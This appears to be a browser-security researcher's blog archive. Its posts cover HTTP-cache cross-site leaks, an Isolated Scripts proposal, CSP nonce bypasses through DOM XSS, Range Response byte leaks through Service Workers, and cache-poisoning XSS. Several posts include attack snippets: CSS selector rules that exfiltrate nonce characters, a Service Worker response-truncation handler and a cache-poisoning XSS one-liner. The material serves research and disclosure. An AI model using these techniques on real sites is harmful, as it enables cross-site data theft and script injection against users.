Showing posts with label chrome. Show all posts
Showing posts with label chrome. Show all posts

Tuesday, March 19, 2019

[🌐💧💥] HTTP Cache Cross-Site Leaks

In this blog post I want to talk about a cool type of attacks (XSLeaks) that are cooler than what most developers and security researchers might realize.

Almost 10 years ago, Chris Evans described an attack against Yahoo! Mail in which a malicious website could search the email inbox of a visitor to his website, and know if the search had returned results or not. This essentially could have allowed him to search the emails of the user word for word, and get to know a lot about the emails received by the user, from who, and when.

Chris did that by simply checking how long the server would take to respond to a search query (done through the victim's browser so it includes cookies), and it concluded that if it took longer to return, it must have been because the search query had results, and if it returned faster, it probably had no results.

the server has at least a 40ms difference in minimum latency between a query for a word not in the index, and a query for a word in the index
The attack was cool, but since it was based on network timing, it was a bit hard to pull off. Six years later, Nethanel Gelernter and Amir Herzberg went a bit deeper into this attack and named it XSSearch (and used statistics to make it more reliable). In the years that followed, the attacks steadily improved, going beyond timing, to browser "misfeatures" and bugs that made the attacks a lot more stable up to near-perfection. In other words, detecting if a search query has results or not is now almost trivial to accomplish through a variety of tricks.

Today I want to bring attention to one of the tricks, a very reliable mechanism to query the HTTP Cache in all browsers (with caveats). As far as I know, previous attacks in this area relied on timing (cached resources load faster than non-cached resources), and were mostly used for figuring out the victim's browser historygeographic location or fingerprinting.

However, while those attacks were interesting, an interesting variation is:
  1. Delete the cache for a specific resource (or list of resources).
  2. Force the browser to render a website (navigation, or prerender).
  3. Check if the browser cached the resource deleted at (1).
Note that what this variation gives you, is that it allows you to figure out if a website loads a specific resource (image, script, stylesheet, etc) or not. In other words, you can just ask the browser a question like:
When the user opens this website: https://www.facebook.com/me/friends will the profile picture of Chris Evans be requested? Or, in other words, am I friends with Chris Evans on Facebook?
Fortunately, Facebook seems to sign their URLs, so you probably can't do this attack so simply, but how about this instead?
When the user opens this website: https://www.facebook.com/groups/bugbountygroup/about will this script https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/xxx.js be requested? Or in other words, do I have access to the Facebook bugbounty group?
This other attack would be more interesting, as long as there is a resource that loads if the user has access, but doesn't load if the user doesn't have access, then you can figure out if a user has access to something or not.

Again, fortunately Facebook actually preloads all scripts and images regardless of whether the user has access to private groups or not.

Now, the same technique applies to search results! You can query the browser and ask:
When the user opens this website: https://www.facebook.com/messages/?qa=indonesia will this script be requested? Or in other words, has the user talked about visiting Indonesia?
Again, fortunately Facebook actually doesn't issue search queries on messages and requires the user to "confirm" the search query :-).


As you can see, some websites have deployed protection against Cross-Site Leaks in the past year, some more effective than others, and I think that this is one of those few attacks that only large websites try to protect against, but most of the internet is still vulnerable to.

So, now that I've described the attack, here's how to do it! The summary of the trick is that it allows you to do two things:
  1. Delete the HTTP Cache for a specific resource or URL
  2. Query the HTTP Cache to see if the browser cached it
To delete the HTTP Cache, you just have to either issue a POST request to the resource, or use the fetch API with cache: "reload" in a way that returns an error on the server (eg, by setting an overlong HTTP referrer), which will lead to the browser not caching the response, and invalidating the previous cached response.

Then after you navigate the user to the site you want to query (either through link rel=prerender, or by navigating another window or frame), you check if the resource was cached or not. You can check if the resource was cached or not by doing the same trick with the overlong HTTP referrer, because if the resource was cached, it will load successfully, and if not, it'll fail. You can see an example of this attack here (that terjanq was nice enough to setup :-).

Here's a nicer explanation of the attack (with a happy cloud and everything):

Depending on who you are, you might either be excited about this, depressed, angry, or ambivalent, here are some suggestions on how to deal with this:
  1. If you are a website author, you might want to think about whether you have any of these leaks, and maybe try to protect against them (see defenses below).
  2. If you are a security researcher, you might want to check the websites you use to see if they are vulnerable (check caveats below).
  3. If you are a browser vendor, you might want to consider implementing double keyed cache (see caveats below).
You probably are wondering what are these caveats that I've been talking about, so here we go:
  • The attack is "complicated" for Safari users, the reason is because Safari has this thing called "Verified Partitioned Cache", which is a technique for preventing user tracking, but that also accidentally helps with this. The way it works is by keying the cache entries to their origin and to the site that loaded the resource. The attack is still possible (because the caching behavior is based on heuristics), but the details of this are probably worth a different blog post.
  • Chrome will hopefully not be vulnerable anymore - the reason is because Chrome is experimenting with "Split Disk Cache", which is somewhat different from Safari's, but has the side-effect of protecting against this attack. Note that this feature is currently behind a flag in Chrome (--enable-features=SplitCacheByTopFrameOrigin), so test it out and send feedback to Chrome =).
  • Firefox users are vulnerable, but they have a preference they can enable to get similar behavior - this is called "First Party Isolation", and is available as an add-on and as a pref (privacy.firstparty.isolate=true). It takes a similar approach to the one implemented in Chrome a few steps further, and splits not only cache but several other things (such as permissions!), so test it out too, and send feedback to Firefox.
And if you are a web developer and are thinking about ways to defend against this, well, I have good news and bad news:
  • You can just disable HTTP cache. This has some bandwidth and performance consequences, though, so maybe don't do that.
  • You can add CSRF tokens to everything. This breaks all bookmarks that your users might have set, so maybe don't do that.
  • You can use SameSite=strict cookies to authenticate users. This is actually quite surprisingly very well supported across browsers, and doesn't break bookmarks. Note, however, that there are some known bypasses (eg, if the site has some types of open redirects, as well as browser implementation bugs).
  • You can use COOP to slow down attackers (so every attack requires a click). Note however that it is only implemented in Firefox, and even in Firefox is behind a pref (browser.tabs.remote.useCrossOriginOpenerPolicy), so test it out and send feedback to Firefox =).
  • You can do all the crazy things that Facebook apparently tries to do to protect against this! Or take a look at this page with some more ideas.
🌐💧💥

I want to end this blog post by saying that HTTP cache is not the only leak there is, there are a ton more! So protecting against Cache is not enough, you can also detect the length of the page, the JS execution cycles, the content-type, the number of TCP sockets, and many more. if you are a security researcher, please contribute! The XSLeaks wiki is a joint effort among several security researchers (terjanq, lbherrera_, ronmasas, _tsuro, arthursaftnes, kkotowicz, and me) trying to explore the limits of cross-site leaks, and hopefully by working together we can come up with better attacks :-). Contact me on twitter if you want to contribute (DMs are open).

Thanks for reading!

Wednesday, January 25, 2017

Fighting XSS with 🛡 Isolated Scripts

TL;DR: Here's a proposal for a new way to fight Cross-Site Scripting vulnerabilities called Isolated Scripts. You have an open-source prototype to play with the idea. Please let me know what you think!

Summary

In the aftermath of all the Christmas' CSP bypasses, a discussion came up with @mikewest and @fgrx on the merits of using the Isolated Worlds concept (explained below) as a security mitigation to fight XSS. It seemed like an interesting problem, so I spent some time looking into it.

The design described below would allow you (a web developer) to defend some of your endpoints against XSS with just two simple steps:
  1. Set a new cookie flag (isolatedScript=true).
  2. Set a single HTTP header (Isolated-Script: true).
And that's it. With those two things you could defend your applications against XSS. It is similar to Suborigins but Isolated Scripts defends against XSS even within the same page!

And that's not it, another advantage is that it also mitigates third-party JavaScript code (such as Ads, Analytics, etcetera). Neat, isn't it?

Design

The design of Isolated Scripts consists of three components that work together to deliver the Isolated Scripts proposal.
  1. Isolated Worlds
  2. Isolated Cookies
  3. Secret HTML
I describe each one of them below and then show you the demo.

🌍 Isolated Worlds


Isolated Worlds is a concept most prominently used today in Chrome Extensions user scripts, and Greasemonkey scripts in Firefox - essentially, they allow JavaScript code to get a "view" over the document's DOM but in an isolated JavaScript runtime. Let me explain:

Let's say that there is a website with the following code:


The Isolated World will have access to document.getElementById("text") but it will not have access to window.variable. That is, the only thing that both scripts share is an independent view of the HTML's DOM. This isolation is very important, because user scripts have elevated privileges, for example, they can trigger XMLHttpRequests requests to any website and read their responses.

If it wasn't for the Isolated World, then the page could do something like this to execute code in the user script, and attack the user:
document.getElementById = function() {
    arguments.callee.caller.constructor("attack()")();
};
In this way, the Isolated World allows us to defend our privileged execution context from the hostile user execution context. Now, the question is: Can we use the same design to protect trusted scripts from Cross-Site Scripting vulnerabilities?

That is, instead of focusing on preventing script execution as a mitigation (which we've found out to be somewhat error prone), why don't we instead focus on differentiating trusted scripts from untrusted scripts?

The idea of having privileged and unprivileged scripts running in the same DOM is not new, in fact, there are a few implementations out there (such as Mario Heiderich's Iceshield, and Antoine Delignat-Lavaud Defensive JS), but their implementation required rewriting code to overcome the hostile attacker. In Isolated Worlds, normal JavaScript code just works.

So, that is the idea behind Isolated Scripts - provide a mechanism for a web author to mark a specific script as trusted, which the browser will then run in an Isolated World.
An easy way to implement this in a demo is by actually reusing the Isolated Worlds implementation in Chrome Extensions, and simply install a user script for every script with the right response header.

🍪 Isolated Cookies


Now that we have a script running in a trusted execution context, we need a way for the web server to identify requests coming from it. This is needed because the server might only want to expose some sensitive data to Isolated Scripts.

The easiest way to do so would be simply by adding a new HTTP request header similar to the Origin header (we could use Isolated-Script: foo.js for example). Another alternative is to create a new type of cookie that is only sent when the request comes from a Isolated Script. This alternative is superior to the HTTP header for two reasons:
  1. It is backwards compatible, browsers that don't implement it will just send the cookie as usual.
  2. It can work in conjunction with Same-site cookies (which mitigates CSRF as well).
To clarify, the web server would do this:
Set-Cookie: SID=XXXX; httpOnly; secure; SameSite=Strict; isolatedScript

And the browser will then process the cookie as usual, except that it will only include it in requests if they are made by the Isolated Script. And browsers that don't understand the new flag will always include them.

An easy way to implement this in a demo is to instead of using flags, using a special name in the cookie, and refuse to send the cookie except for cases when the request comes from the isolated script.
One idea that Devdatta proposed was to make use of cookie prefixes, which could also protect the cookies from clobbering attacks.

🙈 Secret HTML


What we have now is a mechanism for a script to have extra privileges, and be protected from hostile scripts by running in an isolated execution context, however, the script will, of course want to display the data to the user, and if the script writes it to the DOM, the malicious script would immediately be able to read it. So, for that, we need a way for the Isolated Script to write HTML that the hostile scripts can't read.

While this primitive might sound new, it actually already exists today! It's already possible for JavaScript code to write HTML that is visible to the user, but unavailable to the DOM. There are at least two ways to do this:
  1. Creating an iframe and then navigating the iframe to a data:text/html URL (it doesn't work in Firefox because they treat data: URLs as same-origin).
  2. Creating an iframe with a sandbox attribute without the allow-same-origin flag (works in Chrome and Firefox).
So, to recap, we can already create HTML nodes that are inaccessible to the parent page. The only issue left is perhaps how to make it easily backwards compatible. So we have two problems left:
  • CSS wouldn't be propagated down to the iframe, but to solve this problem we can propagate the calculated style down to the iframe's body, which will allow us to ensure that the text would look the same as if it was in the parent page (note, however that selectors wouldn't work inside it).
  • Events wouldn't propagate to the parent page, but to solve that problem we could just install a simple script that forwards all events from the iframe up to the parent document.
With this, the behavior would be fairly similar to the secret HTML but without providing a significant information leak on to the hostile script. 
An easy way to implement this in a demo is to create a setter function on innerHTML, and whenever the isolated script tries to set innerHTML we instead create a sandboxed iframe with the content, to which we postMessage the CSS and the HTML and a message channel that can be used to propagate events up the iframe. To avoid confusing other code dependencies, we could create this iframe inside of a closed Shadow DOM.
One potential concern for the design of this feature that Malte brought up was that depending on the implementation this could potentially mess up with developer experience, as some scripts most likely assume that code in the DOM is reachable (eg, via querySelector, getElementsByTagName or otherwise). This is very important, and possibly the most valuable lesson to take - rather than having security folks like me design APIs with weird restrictions, we should also be asking authors what they need to do their work.

Demo

Alright! So now that I explained the concept and how it was implemented in the demo, it's time for you to see it in action.

First of all, to emulate the browser behavior you need to install a chrome extension (don't worry, no scary permissions), and then just go to the "vulnerable website" and try to steal the contents of the XHR response! If you can steal them, you win a special Isolated Scripts 👕 T-Shirt my eternal gratitude 🙏 (and, of course 🎤 fame & glory).

So, let's do it!
  1. Install Chrome Extension
  2. Go to Proof of Concept website
There are XSS everywhere on the page (both DOM and reflected), and I disabled the XSS filter to make your life easier. I would be super interested to learn about different ways to break this!

Note that there are probably implementation bugs that wouldn't be an issue in a real browser implementation, but please let me know about them anyway (either on twitter or on the comments below), as while they don't negate the design, they are nevertheless something we should keep in mind and fix for the purpose of making this as close to reality as possible.

In case you need it, the source code of the extension is here and the changes required to disable CSP and enable Isolated Scripts instead is here.

🔍 Analysis

Now, I'm obviously biased on this, since I already invested some time on this idea, but I think it's at least promising and has some potential. That said, I want to do an analysis on it's value and impact to avoid over-promising. I will use the framework to measure web security mitigations that I described in my previous blog post (but if you haven't read it, don't worry, I explain this below).

Moderation

Moderation stands for: How much are we limiting the impact of the problem?

In this case, the impact is extremely easy to measure (modulo implementation flaws).
Any secret data that is protected with Isolated Cookies is only exposed to Isolated Scripts. And any data touched by Isolated Scripts is hidden from XSS. So, the web author gets to decide the degree of moderation it requires.
One interesting caveat to this that Mario brought up, is that conducting phishing attacks using XSS would still be possible, and is very likely to result in compromise with a tiny bit of social engineering.

Minimization

Minimization stands for: How much are we minimizing the number of problems?

We can also measure this. Most XSS, including content sniffing and plugin-based SOP bypasses (even some types of universal XSS bugs!) can be mitigated with Isolated Scripts, but some types of DOM XSS aren't.
The DOM XSS that are not mitigated by Isolated Scripts, are, for example, Angular Template Injections, and eval()-based XSS - that is because they still inherit the capabilities of the Isolated Script.
I would love to hear of any other types of bugs that wouldn't be mitigated by Isolated Scripts.

Substitution

Substitution stands for: How much are we replacing risks with safer alternatives?

We can also quickly measure how much we are replacing the current risks with Isolated Scripts. In particular, adoption seems very easy although it has some problems:
  1. JavaScript code hosted in CDNs can't run in the Isolated World. This is working as intended, but also might limit the ease of deployment. One easy way to fix this is to use ES6 import statements.
  2. Code that expects to have access to "secret content" (like advertising, for example) won't be able to do so anymore and might fail in unexpected ways (note, however that in a browser implementation it might make sense to actually give access to the secret HTML to the Isolated script, if possible).
I would be super interested to hear any other problems you think developers might find in adoption.

Simplification

Simplification stands for: How much are we removing problems, rather than adding complexity?

Generally, we are adding complexity and removing complexity, and it's somewhat subjective to decide whether they cancel each other out or not.
  • On one hand, we are removing complexity by requiring all interactions with secret data to happen through a single funnel.
  • On the other hand, by adding yet another cookie flag and a new condition for script execution, and a new type of DOM isolation we are making the web platform more difficult to understand.
I honestly think that we are making this a bit more complicated. Not as much as other mitigations, but slightly so. I would be interested to hear any arguments on how "bad" this complexity would be for the web platform.

Conclusion

Thank you so much for reading so far, and I hope you found reading this as interesting as I found writing it.

I think a good next step from here is to hear more feedback on the proposal (from both, authors, browsers and hackers!), and perhaps identify ways we can simplify it further, ways to break it, and ways to make it more developer friendly.

If you have any ideas, please leave comments below or on twitter (or you can also email me).

Until next time 😸

Tuesday, December 27, 2016

How to bypass CSP nonces with DOM XSS 🎅

TL;DR - CSP nonces aren't as effective as they seem to be against DOM XSS. You can bypass them in several ways. We don't know how to fix them. Maybe we shouldn't.

Thank you for visiting. This blog post talks about CSP nonce bypasses. It starts with some context, continues with how to bypass CSP nonces in several situations and concludes with some commentary. As always, this blog post is my personal opinion on the subject, and I would love to hear yours.

My relationship with CSP, "it's complicated"

I used to like Content-Security-Policy. Circa 2009, I used to be really excited about it. My excitement was high enough that I even spent a bunch of time implementing CSP in JavaScript in my ACS project (and to my knowledge this was the first working CSP implementation/prototype). It supported hashes, and whitelists, and I was honestly convinced it was going to be awesome! My abstract started with "How to solve XSS [...]".

But one day one of my friends from elhacker.net (WHK) pointed out that ACS (and CSP by extension) could be trivially circumvented using JSONP. He pointed out that if you whitelist a hostname that contains a JSONP endpoint, you are busted, and indeed there were so many, that I didn't see an easy way to fix this. My heart was broken.💔

Fast-forward to 2015, when Mario Heiderich made a cool XSS challenge called "Sh*t, it's CSP!", where the challenge was to escape an apparently safe CSP with the shortest payload possible. Unsurprisingly, JSONP made an appearance (but also Angular and Flash). Talk about beating a dead horse.

And then finally in 2016 a reasonably popular paper called "CSP Is Dead, Long Live CSP!" came out summarizing the problems highlighted by WHK and Mario after doing an internet-wide survey of CSP deployments, performed by Miki, Lukas, Sebastian and Artur. The conclusion of the paper was that CSP whitelists were completely broken and useless. At least CSP got a funeral , I thought.

However, that was not it. The paper, in return, advocated for the use of CSP nonces instead of whitelists. A bright future for the new way to do CSP!

When CSP nonces were first proposed, my concern with them was that their propagation seemed really difficult. To solve this problem, dominatrixss-csp back in 2012 made it so that all dynamically generated script nodes would work by propagating the script nonces with it's dynamic resource filter. This made nonce propagation really simple. And so, this exact approach was proposed in the paper, and named strict-dynamic, now with user-agent support, rather than a runtime script as dominatrixss-csp was. Great improvement. We got ourselves a native dominatrixss!

This new flavor of CSP, proposed to ignore whitelists completely, and rely solely on nonces. While the deployment of CSP nonces is harder than whitelists (as it requires server-side changes on every single page with the policy), it nevertheless seemed to propose real security benefits, which were clearly lacking on the whitelist-based approach. So yet again, this autumn, I was reasonably optimistic of this new approach. Perhaps there was a way to make most XSS actually *really* unexploitable this time. Maybe CSP wasn't a sham after all!

But this Christmas, as-if it was a piece of coal from Santa, Sebastian Lekies pointed out what in my opinion, seems to be a significant blow to CSP nonces, almost completely making CSP ineffective against many of the XSS vulnerabilities of 2016.

A CSS+CSP+DOM XSS three-way

While CSP nonces indeed seem resilient against 15-years-old XSS vulnerabilities, they don't seem to be so effective against DOM XSS. To explain why, I need to show you how web applications are written now a days, and how that differs from 2002.

Before, most of the application logic lived in the server, but in the past decade it has been moving more and more to the client. Now a days, the most effective way to develop a web application is by writing most of the UI code in HTML+JavaScript. This allows, among other things for making web applications offline-ready, and provides access to an endless supply of powerful web APIs.

And now, newly developed applications still have XSS, the difference is that since a lot of code is written in JavaScript, now they have DOM XSS. And these are precisely the types of bugs that CSP nonces can't consistently defend against (as currently implemented, at least).

Let me give you three examples (non-exhaustive list, of course) of DOM XSS bugs that are common and CSP nonces alone can't defend against:
  1. Persistent DOM XSS when the attacker can force navigation to the vulnerable page, and the payload is not included in the cached response (so need to be fetched).
  2. DOM XSS bugs where pages include third-party HTML code (eg, fetch(location.pathName).then(r=>r.text()).then(t=>body.innerHTML=t);)
  3. DOM XSS bugs where the XSS payload is in the location.hash (eg, https://victim/xss#!foo?payload=).
To explain why, we need to travel back in time to 2008 (woooosh!). Back in 2008, Gareth Heyes, David Lindsay and I made a small presentation in Microsoft Bluehat called CSS - The Sexy Assassin. Among other things, we demonstrated a technique to read HTML attributes purely with CSS3 selectors (which was coincidentally rediscovered by WiSec and presented with kuza55 on their 25c3 talk Attacking Rich Internet Applications a few months later).

The summary of this attack is that it's possible to create a CSS program that exfiltrates the values of HTML attributes character-by-character, simply by generating HTTP requests every time a CSS selector matches, and repeating consecutively. If you haven't seen this working, take a look here. The way it works is very simple, it just creates a CSS attribute selector of the form:

*[attribute^="a"]{background:url("record?match=a")}
*[attribute^="b"]{background:url("record?match=b")}
*[attribute^="c"]{background:url("record?match=c")}
[...]

And then, once we get a match, repeat with:
*[attribute^="aa"]{background:url("record?match=aa")}
*[attribute^="ab"]{background:url("record?match=ab")}
*[attribute^="ac"]{background:url("record?match=ac")}
[...]

Until it exfiltrates the complete attribute.

The attack for script tags is very straightforward. We need to do the exact same attack, with the only caveat of making sure the script tag is set to display: block;.

So, we now can extract a CSP nonce using CSS and the only thing we need to do so is to be able to inject multiple times in the same document. The three examples of DOM XSS I gave you above permit exactly just that. A way to inject an XSS payload multiple times in the same document. The perfect three-way.

Proof of Concept

Alright! Let's do this =)

First of all, persistent DOM XSS. This one is troubling in particular, because if in "the new world", developers are supposed to write UIs in JavaScript, then the dynamic content needs to come from the server asynchronously.

What I mean by that is that if you write your UI code in HTML+JavaScript, then the user data must come from the server. While this design pattern allows you to control the way applications load progressively, it also makes it so that loading the same document twice can return different data each time.

Now, of course, the question is: How do you force the document to load twice!? With HTTP cache, of course! That's exactly what Sebastian showed us this Christmas.

A happy @slekies wishing you happy CSP holidays! Ho! ho! ho! ho!
Sebastian explained how CSP nonces are incompatible with most caching mechanisms, and provided a simple proof of concept to demonstrate it. After some discussion on twitter, the consequences became quite clear. In a cool-scary-awkward-cool way.

Let me show you with an example, let's take the default Guestbook example from the AppEngine getting started guide with a few modifications that add AJAX support, and CSP nonces. The application is simple enough and is vulnerable to an obvious XSS but it is mitigated by CSP nonces, or is it?

The application above has a very simple persistent XSS. Just submit a XSS payload (eg, <H1>XSS</H1>) and you will see what I mean. But although there is an XSS there, you actually can't execute JavaScript because of the CSP nonce.

Now, let's do the attack, to recap, we will:

  1. with CSS attribute reader.
  2. with the CSP nonce.

Stealing the CSP nonce will actually require some server-side code to keep track of the bruteforcing. You can find the code here, and you can run it by clicking the buttons above.

If all worked well, after clicking "Inject the XSS payload", you should have received an alert. Isn't that nice? =). In this case, the cache we are using is the BFCache since it's the most reliable, but you could use traditional HTTP caching as Sebastian did in his PoC.

Other DOM XSS

Persistent DOM XSS isn't the only weakness in CSP nonces. Sebastian demonstrated the same issue with postMessage. Another endpoint that is also problematic is XSS through HTTP "inclusion". This is a fairly common XSS vulnerability that simply consists on fetching some user-supplied URL and echoing it back in innerHTML. This is the equivalent of Remote File Inclusion for JavaScript. The exploit is exactly the same as the others.

Finally, the last PoC of today is one for location.hash, which is also very common. Maybe the reason is because of IE quirks, but many websites have to use the location hash to implement history and navigation in a single-page JavaScript client. It even has a nickname "hashbang". In fact, this is so common that every single website that uses jQuery Mobile has this "feature" enabled by default, whether they like it or not.

Essentially, any website that uses hashbang for internal navigation is as vulnerable to reflected XSS as if CSP nonces weren't there to being with. How crazy is that! Take a look at the PoC here (Chrome Only - Firefox escapes location.hash).

Conclusion

Wow, this was a long blog post.. but at least I hope you found it useful, and hopefully now you will be able to understand a bit better the real effectiveness of CSP, maybe learn a few browser tricks, and hopefully got some ideas for future research.

Is CSP preventing any vulns? Yes, probably! I think all the bugs reported by GOBBLES in 2002 should be preventable with CSP nonces.

Is CSP a panacea? No, definitely not. It's coverage and effectiveness is even more fragile than we (or at least I) originally thought.

Where do we go from here?
  • We could try to lock CSP at runtime, as Devdatta proposed.
  • We could disallow CSS3 attribute selectors to read nonce attributes.
  • We could just give up with CSP. 💩
I don't think we should give up.. but I also can't stop wondering whether all this effort we spend on CSP could be better used elsewhere - specially since this mechanism is so fragile it runs the real risk of creating an illusion of security where it does not exist. And I don-t think I'm alone in this assessment.. I guess time will tell.

Anyway, happy holidays, everyone! and thank you for reading. If you have any feedback, or comments please comment below or on Twitter!

Hasta luego!

Sunday, October 04, 2015

Range Responses: Mix, Match & Leak

Hey!

The videos from AppSec 2015 are now online, and the Service Workers talk is too. Anyway, this post is about another of the slides in the presentation about Range Requests / Responses (or.. more commonly known as Byte Serving) and Service Workers.

As things go, turns out you can read content cross-domain with this attack, and this post explains how that works. Range Responses are essentially normal HTTP responses that only contain a subset of the body. It works like this:

It's relatively straight forward! With service workers in the mix, you can do similar things:

And, I mean, what happens there is that the Service Worker intercepts the first request and gives you LoL instead of Foo. Note that this works cross-origin since Service Workers apply to the page that created the request (so, say, if evil.com embeds a video from apple.com, the service worker from evil.com will be able to intercept the request to apple.com). One thing to note about this, is that the Service Worker actually controls the total length of the response. What this means, is that even if the actual response is 2MB if the Service Worker says it's 100KB, the browser will believe the Service Worker (it seems browsers respect the first response size they see, in this case, the one from the service worker).

This all started when I noticed is that you could split a response in two, one generated by a Service Worker and one that isn't. To clarify, the code below, intercepts a request to a song. What's interesting about it, is that it actually serves part of the response from the Service Worker (the first 3 bytes).

Another interesting aspect, is that the size of the file is truncated to 5,000 bytes. This is because the browser remembers the first provided length.

The code for this (before the bug was patched by Chrome) was:
  // Basic truncation example
  if (url.pathname == '/wikipedia/ru/c/c6/Glorious.ogg') {
    if (e.request.headers.get('range') == 'bytes=0-') {
      console.log('responding with fake response');
      e.respondWith(
        new Response(
          'Ogg', {status: 206, headers: {'content-range': 'bytes 0-3/5000'}}))
    } else {
      console.log('ignoring request');
    }
    return;
  }
So, to reiterate, the request is responding with "Ogg" as the first three bytes, and truncating the response to 5,000 bytes. Alright, so what can you do with this? Essentially, you can partially control audio/video responses, but it's unlikely this can cause a lot of problems, right? I mean, so what you can make a bad song last 1 second rather than 30 seconds?.

To exploit this we need to take a step back and see the data as the video decoder sees it. In essence, the video decoder doesn't actually know anything about range responses, it just sees a stream of bytes. Imagine if the video that the decoder sees had the following format:

  • [Bytes 0-100] Video Header
  • [Bytes 101-200] Video Frame
  • [Bytes 201-202] Checksum of Video Frame
But the content in ORANGE comes from the Service Worker, and the content in RED comes from the target/victim site. A clever attacker would send 65 thousand different video frames until one of them doesn't error out, and then we would know what is the value of the bytes 201 and 202 of the target/victim site.

I searched for a while for a video format or container with this property, but unfortunately didn't find one. To be honest, I didn't look too hard as it's really confusing to read these specs but essentially after like 1 hour of searching and scratching my head I gave up, and decided to do some fuzzing instead.

The fuzzing was essentially like this:
  1. Get a sample of video and audio files.
  2. Load them in audio/video tags.
  3. Listen to all events.
  4. Fetch the video from length 0-X, and claim a length of X+1.
  5. Have the last byte be 0xFF.
  6. Repeat
And whenever it found a difference between the response on 0-X and 0-X+1, that means there's an info leak! I did this and in a few hours and after wasting my time looking at MP3 files (it seems they just give out approximate duration at random) I found a candidate. Turns out it wasn't a checksum, it was something even better! :)

So, I found that a specific Encrypted WebM video errors out when truncated to 306 bytes if the last byte is greater than 0x29, but triggers an onencrypted event when it's less than that. This seems super weird, but that's a good start, I guess. I created a proof of concept, where I tested whether the byte in a cross-origin resource is less than 0x29 or not. If you have a vulnerable browser (Chrome <=44) you can see this proof of concept here:
If you compare both pages you will see that one says PASS and the other says FAIL. The reason is because in the position 306 of the robots.txt of www.bing.com there is a new line, while in the position 306 of www.yahoo.com there is a letter.

Good enough you might think! I can now know whether position 306 is a space or not. Not really very serious, but serious enough to be cool, right? No. Of course not.

First of all, I wanted to know how to make this apply to any offset, not just 306. It was easy enough to just create another EBML object of arbitrary size. Then that's about it! You just make the size longer and longer. So first problem solved. Now you can change the byte offset you are testing.

But still, the only thing I can know is whether the character at that position is a space or not. So, I started looking into why that errored out, and turns out it was because the dimensions of the video were too big. There is a limit on the pixel size of a video because of some reason, and the byte in position 306 happened to be the video height dimensions that was longer than it was valid.

So, well.. now that we know that, can we learn the exact value? What if we tried to load the video 256 times, each time with a different width value, for which it would overflow if the size is too big. The formula the video decoder was using for calculating the maximum dimensions is:


So! Seems easy enough then. I get the minimum value on which it errors out, and calculate it's complement to INT_MAX/8 (minus 128), and that's the value of the byte at that position. Since this is a "less than" comparison you can solve this minimum value with a simple binary search.

And that's it. I made a slightly nicer exploit here, although the code is quite unreadable. The PoC will try to steal byte by byte of the robots.txt of www.bing.com.

Severity-wise fortunately, this isn't an end-of-the-world situation. Range Responses (or.. Byte Serving) don't actually work on any dynamically generated content I found online. This is most likely because dynamic generated content isn't static, so requesting it in chunks doesn't make sense.

And that's it for today! It's worth noting that it's possible this isn't specific with Service Workers as it seems that HTTP redirects have a similar effect (you make two requests to a same-origin video, the first time you respond with a truncated video, the second time you redirect to another domain).

Specially since Service Workers aren't as widely supported yet. Feel free to write a PoC for that (you can use this for inspiration). And once the bug is public, you can follow along this bug discovery here and the spec discussion here.

The bug is fixed in Chrome, but I didn't test other browsers as thoroughly for lack of time (and this blog post is already delayed for like 3 months because of Chrome, so didn't want to embargo this further). If you do find a way to exploit this elsewhere, please let me know the results, and happy to help if you get stuck.

Have a nice day!

Wednesday, May 27, 2015

[Service Workers] Secure Open Redirect becomes XSS Demo

This is the shortest delay between blog posts I've had in a while, but I figured that since my  last post had some confusing stuff, it might make sense to add a short demo. The demo application has three things that enable the attack:

  1. An open redirect. Available at /cgi-bin/redirect?continue=.
  2. A Cache Service Worker. Available at /sw.js.
  3. A page that embeds images via <img crossorigin="anonymous" src="" />.
And the attacker's site has one thing:
  1. A CORS enabled attack page. Available at /cgi-bin/attack.
Let's do the attack then! For it to work we need two things to happen:
  • The service worker must be installed.
  • A request to our attack page must be cached with mode=cors.
Our index.html page will do both of those things for us.
Poison Cache

Image URL:



When you click submit above the following things will happen:
  1. A service worker will be installed for the whole origin.
  2. An image tag pointing to the open redirect will be created.
  3. The service worker will cache the request with the CORS response of the attacker.
If all went well, the page above should be "poisoned", and forever (or until the SW updates it's cache) you will get the XSS payload. Try it (note that you must have first "poisoned" the response above, if you click the button below here before poisoning the cache first, you will ruin the demo for ever since an opaque response will get cached ;):
If the demo doesn't work for you, that probably means you navigated to the attack page before caching the CORS response. If that's the case, to clear the cache.

Note you need Chrome 43 or later for this to work (or a nightly version of Firefox with the flags flipped). Hope this clarifies things a bit!

Monday, May 25, 2015

[Service Workers] New APIs = New Vulns = Fun++


Just came back from another great HackPra Allstars, this time in the beautiful city of Amsterdam. Mario was kind enough to invite me to ramble about random security stuff I had in mind (and this year it was Service Workers). The presentation went OK and it was super fun to meet up with so many people, and watch all those great presentations.

In any case, I promised to write a blog post to repeat the presentation but in a written form, however I was hoping to watch the video to see what mistakes I might have made and correct them in the blog post, and the video is not online yet. Anyway, so, until then, today this post is about something that wasn't mentioned in the talk.

This is about what type of vulnerabilities applications using Service Workers are likely to create. To start, I just want to say that I totally love Service Workers! It's APIs are easy to use and understand and the debugging tools in Chrome are beautiful and well done (very important since tools such as Burp or TamperChrome wouldn't work as well with offline apps as no requests are actually done.) You can clearly see that a lot of people have thought a lot about this problem, and there is some serious effort around making offline application development possible.

The reason this blog post content wasn't part of the presentation is because I thought it already had too much content, but if you don't know how Service Workers work, you might want to see the first section of the slides (as it's an introduction) or you can read this article or this video.

Anyway, so back to biz.. Given that there aren't many "real" web applications using Service Workers, I'll be using the service-worker samples from the w3c-webmob, but as soon as you start finding real service worker usage take a look and let me know if you find these problems too!

There are two main categories of potential problems I can see:
  1. Response and Caching Issues
  2. Web JavaScript Web Development

Response and Caching Issues

The first "category" or "family" of problems are response and caching issues. These are issues that are present because of the way responses are likely to be handled by applications.

Forever XSS

The first problem, that is probably kind-of bad, is the possibility of making a reflected XSS into a persistent XSS. We've already seen this type of problems based on APIs like localStorage before, but what makes this difference is that the Cache API is actually designed to do exactly that!

When the site is about to request a page from the web, the service worker is consulted first. The service worker at this point can decide to respond with a cache response (it's logic is totally delegated to the Service Worker). One of the main use-cases for service workers is to serve a cached-up copy of the request. This cache is programmatic and totally up-to the application to decide how to handle it.

One coding pattern for Service Workers is to respond with whatever is in the cache, if available or, to make a request if not (and cache the response). In other words, in those cases, no request is ever made to the server if the request matches a cached response. Since this Cache database is accessible to any JS code running in the same origin, an attacker can pollute the Cache with whatever it wants, and let the client serve the malicious XSS for ever!

If you want to try this out, go here:

Then fake an XSS by typing this to the console:
caches.open('prefetch-cache-v1').then(function(cache){cache.put(new Request('index.html', {mode: 'no-cors'}), new Response('\x3cscript>alert(1)\x3c/script>', {headers: {'content-type': 'text/html'}}))})
